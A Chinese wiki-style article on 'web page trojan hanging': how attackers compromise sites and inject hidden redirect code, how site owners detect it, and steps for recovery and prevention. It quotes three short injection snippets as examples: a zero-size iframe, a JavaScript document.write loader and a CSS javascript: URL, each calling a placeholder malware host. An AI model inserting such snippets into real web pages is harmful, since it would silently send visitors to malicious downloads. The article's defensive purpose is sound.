所謂的掛馬，就是黑客通過各種手段，包括SQL注入，網(wǎng)站敏感文件掃描，服務器漏洞，網(wǎng)站程序0day, 等各種方法獲得網(wǎng)站管理員賬號，然后登陸網(wǎng)站后臺，通過數(shù)據(jù)庫 備份/恢復 或者上傳漏洞獲得一個webshell。利用獲得的webshell修改網(wǎng)站頁面的內(nèi)容，向頁面中加入惡意轉(zhuǎn)向代碼。也可以直接通過弱口令獲得服務器或者網(wǎng)站FTP，然后直接對網(wǎng)站頁面直接進行修改。當你訪問被加入惡意代碼的頁面時，你就會自動的訪問被轉(zhuǎn)向的地址或者下載木馬病毒。

網(wǎng)頁掛馬的危害[ ]

很多游戲網(wǎng)站被掛馬，黑客目的就是盜取瀏覽該網(wǎng)站玩家的游戲賬號，而那些大型網(wǎng)站被掛馬，則是為了搜集大量的肉雞。網(wǎng)站被掛馬不僅會讓自己的網(wǎng)站失去信譽，丟失大量客戶，也會讓我們這些普通用戶陷入黑客設下的陷阱，淪為黑客的肉雞。 　　如果不小心進入了已被掛馬的網(wǎng)站，則會感染木馬病毒，以致丟失大量的寶貴文件資料和賬號密碼，其危害極大。

如何分辨自己的網(wǎng)站是否被掛馬[ ]

其實我們現(xiàn)在說的所謂的掛馬一般就是在那些可編輯文件下或是頭部加入一段代碼來實現(xiàn)跳轉(zhuǎn)到別的網(wǎng)站訪問那個他們指定的HTML網(wǎng)頁木馬的然后通過你電腦本身的漏洞攻破你的系統(tǒng)給你下載一個下載者，然后那下載者設定多少時間后開始在指定地點隱藏下載木馬并運行。所以說我們只要把那段代碼給清理掉了就達到了清理掛馬的作用了。所以我們首先要辨別是不是自己的站是不是被掛馬。你如果打開網(wǎng)站發(fā)現(xiàn)很卡但是殺毒軟件沒報警別以為沒事了，很多馬很有可能做了免殺處理所以殺軟沒反映。我們打開網(wǎng)站點查看源代碼如果頂部或是底下出現(xiàn)了這樣的代碼就恭喜你種標了。比如：

<iframe src=http: //www.baidu/muma.html width=0 height=0></iframe> 　　

插入一個長和高都是0框架運行,http: //www.baidu/muma.html這個頁面。

但是因為框架的長和高都是零你就沒辦法看到那個窗口了。但是如果你沒在頂部和底部發(fā)現(xiàn)這些代碼就以為沒事了，有的人還會在中間插入，只是在底部和頂部絕對不會影響到網(wǎng)站的整體結(jié)構(gòu)不用想那么多。但是如果那個掛馬的哥們稍微耐心一點多測試一下在網(wǎng)站代碼的中間還是很容易的。所以如果你代碼太多嫌找著麻煩的話你就可以直接在IE瀏覽器里點查看--隱私里看到底有沒有外連到別的站上去的站。有的話那很有可能被掛馬了。（如果你的站采集了的別人的圖片的話在隱私里會有連到別人那的哦，或是統(tǒng)計代碼也是，所以這要自己分析，哪些是正常的，哪些不是）！有的童鞋可能會說你這人真苯怎么不知道在源文件里直接查找<iframe這個呢。這樣快多了，但是我想說的是不是所有人都是用插入框架的方法掛馬的，方法可是有很多的哦，我就給大家列舉一下比如：

• js文件掛馬 　　

首先將以下代碼 　　

document.write("<iframe width='0' height='0' 
src='http //www.baidu/muma.htm'></iframe>"); 

保存為xxx.js， 則JS掛馬代碼為

<script language=javascript src=xxx.js></script>

• css中掛馬 　　

body {
    background-image: url('javascript:document.write("<script 
    src=http: //www.baidu/muma.js></script>")')
 }

網(wǎng)站掛馬的具體恢復措施及預防[ ]

恢復措施：

1. 整站被掛馬，最快速的恢復方法是，除開數(shù)據(jù)庫、上傳目錄之外，替換掉其他所有文件；
2. 仔細檢查網(wǎng)站上傳目錄存放的文件，很多木馬偽裝成圖片保存在上傳目錄，你直接把上傳文件夾下載到本地，用縮略圖的形式，查看是不是圖片，如果不顯示，則一律刪除；
3. 數(shù)據(jù)庫里面存在木馬，則把數(shù)據(jù)庫的木馬代碼清除。可以采用查找替換；
4. 如果網(wǎng)站源文件沒有，則需要FTP下載網(wǎng)站文件，然后再DW里面，用替換清除的方式一個個清除，注意網(wǎng)站的木馬數(shù)，如果被掛了很多不同的，必須多多檢查

預防措施 ：

1. 建議用戶通過ftp來上傳、維護網(wǎng)頁，盡量不安裝asp的上傳程序。
2. 對asp上傳程序的調(diào)用一定要進行身份認證，并只允許信任的人使用上傳程序。這其中包括各種新聞發(fā)布、商城及論壇程序，只要可以上傳文件的asp都要進行身份認證!
3. asp程序管理員的用戶名和密碼要有一定復雜性，不能過于簡單，還要注意定期更換。
4. 到正規(guī)網(wǎng)站下載asp程序，下載后要對其數(shù)據(jù)庫名稱和存放路徑進行修改，數(shù)據(jù)庫文件名稱也要有一定復雜性。
5. 要盡量保持程序是最新版本。
6. 不要在網(wǎng)頁上加注后臺管理程序登陸頁面的鏈接。
7. 為防止程序有未知漏洞，可以在維護后刪除后臺管理程序的登陸頁面，下次維護時再通過ftp上傳即可。
8. 要時常備份數(shù)據(jù)庫等重要文件。
9. 日常要多維護，并注意空間中是否有來歷不明的asp文件。記?。阂环趾顾瑩Q一分安全!
10. 一旦發(fā)現(xiàn)被入侵，除非自己能識別出所有木馬文件，否則要刪除所有文件。
11. 定期對網(wǎng)站進行安全的檢測，具體可以利用網(wǎng)上一些工具，如億思網(wǎng)站安全檢測平臺。

相關(guān)條目[ ]

• 木馬
• 病毒

參考來源[ ]

• http://baike.baidu.com/view/368.htm